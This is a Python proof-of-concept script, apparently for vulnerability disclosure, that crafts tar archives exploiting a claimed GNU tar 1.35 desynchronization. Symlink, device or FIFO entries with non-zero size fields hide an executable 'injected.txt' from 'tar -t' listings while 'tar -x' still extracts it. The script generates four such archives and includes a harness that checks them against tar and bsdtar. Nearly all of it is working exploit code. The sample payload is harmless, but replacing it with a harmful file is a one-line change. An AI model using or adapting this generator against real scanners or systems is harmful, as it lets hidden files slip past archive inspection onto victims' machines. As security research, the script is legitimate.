#!/usr/bin/env python3
"""
Minimal PoC: GNU tar stream desynchronization (listing vs extraction mismatch).

GNU tar 1.35 handles non-data-bearing typeflags (symlink, chardev, blockdev, FIFO)
with non-zero size fields differently in listing (-t) vs extraction (-x) mode:

  - tar -t: skips `size` bytes of data blocks (treats them as payload to skip)
  - tar -x: ignores the size field entirely and parses the next block as a header

This allows crafting archives where `tar -t` reports N entries but `tar -x`
creates N+M files. The extra files are completely invisible to listing.

Impact: Any security scanner that relies on `tar -t` (or equivalent listing API)
to inspect archive contents before extraction will miss injected files.

Affected: GNU tar 1.35 (and likely earlier versions)
Not affected: bsdtar 3.7.2 (libarchive) — consistent in both modes

Usage:
    python3 cve_desync_poc.py              # Generate PoC archives
    python3 cve_desync_poc.py --verify     # Generate + verify with tar/bsdtar

The PoC generates archives for all four vulnerable typeflags (2,3,4,6).
"""

import os
import struct
import subprocess
import sys
import tempfile
import time

BLOCK = 512  # tar block size in bytes; headers occupy exactly one block


def make_header(name, size=0, mode=0o644, typeflag=b'0', linkname=b'',
                devmajor=b'0000000\x00', devminor=b'0000000\x00'):
    """Build a minimal valid POSIX (ustar) tar header.

    Args:
        name: Member name (bytes or str). Silently truncated to 100 bytes.
        size: Value for the size field; must fit in 11 octal digits.
        mode: Permission bits; must fit in 7 octal digits.
        typeflag: Entry type (bytes or str). Only the first byte is used;
            an empty value leaves the field as NUL.
        linkname: Link target (bytes or str). Silently truncated to 100 bytes.
        devmajor: Raw bytes (or str) for the devmajor field, at most 8 bytes
            are written. A falsy value leaves the field zero-filled.
        devminor: Same as ``devmajor`` but for the devminor field.

    Returns:
        A ``bytes`` object of exactly ``BLOCK`` bytes with uid/gid 0,
        uname/gname ``root``, mtime set to the current time and a valid
        checksum.

    Raises:
        ValueError: If ``size`` or ``mode`` is negative or too large for its
            fixed-width octal field.
    """
    if isinstance(name, str):
        name = name.encode()
    if isinstance(typeflag, str):
        typeflag = typeflag.encode()
    if isinstance(linkname, str):
        linkname = linkname.encode()

    h = bytearray(BLOCK)

    def put(offset, width, value):
        # Clamp to the field width and assign to a slice of exactly the same
        # length. Assigning a shorter/longer value to a bytearray slice would
        # resize the buffer and shift every later field.
        value = value[:width]
        h[offset:offset + len(value)] = value

    def put_octal(offset, digits, value, field):
        # Fixed-width, zero-padded octal; the byte after the digits stays NUL.
        if not 0 <= value < 8 ** digits:
            raise ValueError(
                f"{field}={value!r} does not fit in {digits} octal digits")
        put(offset, digits, f'{value:0{digits}o}'.encode('ascii'))

    put(0, 100, name)
    put_octal(100, 7, mode, 'mode')
    put_octal(108, 7, 0, 'uid')
    put_octal(116, 7, 0, 'gid')
    put_octal(124, 11, size, 'size')
    put_octal(136, 11, int(time.time()), 'mtime')
    put(156, 1, typeflag)
    put(157, 100, linkname)
    put(257, 6, b'ustar\x00')   # magic
    put(263, 2, b'00')          # version
    put(265, 32, b'root')       # uname
    put(297, 32, b'root')       # gname

    if devmajor:
        if isinstance(devmajor, str):
            devmajor = devmajor.encode()
        put(329, 8, devmajor)
    if devminor:
        if isinstance(devminor, str):
            devminor = devminor.encode()
        put(337, 8, devminor)

    # The checksum is the byte sum of the header with the checksum field
    # itself treated as eight spaces, stored as six octal digits, NUL, space.
    h[148:156] = b'        '
    chksum = sum(h) & 0x1FFFF
    h[148:156] = b'%06o\x00 ' % chksum
    return bytes(h)


def pad512(data):
    """Return ``data`` extended with NUL bytes up to the next BLOCK multiple.

    Input whose length is already a multiple of BLOCK (including empty
    input) is returned as-is.
    """
    remainder = len(data) % BLOCK
    if remainder == 0:
        return data
    # bytes(n) is n zero bytes, i.e. the NUL fill for the final partial block.
    data += bytes(BLOCK - remainder)
    return data


def make_desync_archive(carrier_typeflag, carrier_name=b'carrier_entry'):
    """
    Build a tar archive that exploits the listing/extraction desync.

    Args:
        carrier_typeflag: Typeflag of the carrier entry, as bytes or str
            (e.g. b'2' symlink, b'3' chardev, b'4' blockdev, b'6' FIFO).
        carrier_name: Member name of the carrier entry.

    Returns:
        The complete archive as bytes.

    Structure:
        [carrier_header]     typeflag=carrier_typeflag, size=len(injected)
        [injected_header]    typeflag='0' (regular file), name='injected.txt'
        [injected_data]      content of injected.txt
        [marker_header]      typeflag='0', name='marker.txt'
        [marker_data]        content of marker.txt
        [end-of-archive]     two zero blocks

    Behavior:
        tar -t:  carrier_entry, marker.txt           (2 entries — skips injected)
        tar -x:  carrier_entry, injected.txt, marker.txt  (3 entries)
    """
    # make_header() accepts str typeflags, so normalise here as well;
    # otherwise the bytes comparisons below would never match a str and the
    # carrier would silently lose its link target / device numbers.
    if isinstance(carrier_typeflag, str):
        carrier_typeflag = carrier_typeflag.encode()

    is_symlink = carrier_typeflag == b'2'
    is_device = carrier_typeflag in (b'3', b'4')

    # The injected file that will be invisible to listing
    injected_content = b'#!/bin/sh\necho "This file is invisible to tar -t"\n'
    injected_header = make_header(name=b'injected.txt', size=len(injected_content), mode=0o755)
    injected_data = pad512(injected_content)

    # This is the "data" for the carrier entry: a full header + data pair
    fake_payload = injected_header + injected_data

    # Carrier header: non-data typeflag with size = len(fake_payload)
    carrier_header = make_header(
        name=carrier_name,
        typeflag=carrier_typeflag,
        size=len(fake_payload),
        linkname=b'/dev/null' if is_symlink else b'',
        devmajor=b'0000001\x00' if is_device else b'0000000\x00',
        devminor=b'0000003\x00' if is_device else b'0000000\x00',
    )

    # Marker file (verifies stream re-synchronization)
    marker_content = b'MARKER OK\n'
    marker_header = make_header(name=b'marker.txt', size=len(marker_content), mode=0o644)
    marker_data = pad512(marker_content)

    # End of archive: two all-zero blocks
    end = b'\x00' * BLOCK * 2

    return b''.join((carrier_header, fake_payload, marker_header, marker_data, end))


def _list_members(impl, path, timeout=5):
    """Return the non-empty lines printed by ``impl -tf path``."""
    listing = subprocess.run(
        [impl, '-tf', path],
        capture_output=True, text=True, timeout=timeout
    )
    return [line for line in listing.stdout.strip().split('\n') if line]


def _extract_members(impl, path, timeout=5):
    """Extract ``path`` with ``impl`` and return what appeared on disk.

    Extraction happens in a fresh private temporary directory that is removed
    on every exit path (including a timeout). Returned paths are relative to
    that directory; directories carry a trailing '/'.
    """
    with tempfile.TemporaryDirectory(prefix=f'_desync_cve_{impl}_') as extract_dir:
        subprocess.run(
            [impl, '-xf', path, '-C', extract_dir],
            capture_output=True, text=True, timeout=timeout
        )
        extracted = []
        for root, dirs, files in os.walk(extract_dir):
            extracted.extend(
                os.path.relpath(os.path.join(root, fn), extract_dir)
                for fn in files
            )
            extracted.extend(
                os.path.relpath(os.path.join(root, dn), extract_dir) + '/'
                for dn in dirs
            )
    return extracted


def _verify_archive(impl, path):
    """List and extract ``path`` with ``impl`` and print whether they agree."""
    try:
        listed = _list_members(impl, path)
    except FileNotFoundError:
        print(f"  {impl}: not found, skipping")
        return
    except subprocess.TimeoutExpired:
        print(f"  {impl} -t: TIMEOUT")
        return

    try:
        extracted = _extract_members(impl, path)
    except subprocess.TimeoutExpired:
        print(f"  {impl} -x: TIMEOUT")
        return

    has_injected_list = 'injected.txt' in listed
    has_injected_disk = 'injected.txt' in extracted

    print(f"  {impl:<8} -t: {listed}")
    print(f"  {impl:<8} -x: {sorted(extracted)}")
    if has_injected_disk and not has_injected_list:
        print(f"  {impl:<8} *** DESYNC: injected.txt invisible to -t, created by -x ***")
    elif has_injected_list == has_injected_disk:
        print(f"  {impl:<8} CONSISTENT (no desync)")
    else:
        # Listed but never created: previously this case printed no verdict.
        print(f"  {impl:<8} MISMATCH: injected.txt listed by -t but not created by -x")


def main():
    """Write one PoC archive per carrier typeflag; with --verify, test them.

    Archives are written to ``../payloads/cve_desync`` relative to this
    script. When ``--verify`` is present in ``sys.argv``, each archive is
    listed and extracted with ``tar`` and ``bsdtar`` and the results compared.
    """
    verify = '--verify' in sys.argv

    outdir = os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', 'payloads', 'cve_desync')
    os.makedirs(outdir, exist_ok=True)

    typeflags = [
        (b'2', 'symlink',  'desync_symlink.tar'),
        (b'3', 'chardev',  'desync_chardev.tar'),
        (b'4', 'blockdev', 'desync_blockdev.tar'),
        (b'6', 'FIFO',     'desync_fifo.tar'),
    ]

    print("GNU tar stream desynchronization PoC")
    print("=" * 60)

    for tf, name, filename in typeflags:
        path = os.path.join(outdir, filename)
        archive = make_desync_archive(tf)
        with open(path, 'wb') as f:
            f.write(archive)
        print(f"\n[{name}] {path} ({len(archive)} bytes)")

        if verify:
            for impl in ['tar', 'bsdtar']:
                _verify_archive(impl, path)

    print(f"\n{'=' * 60}")
    print("Archives written to:", outdir)
    if not verify:
        print("Run with --verify to test against installed tar implementations.")

# Script entry point: run main() only when executed directly, not on import.
if __name__ == '__main__':
    main()
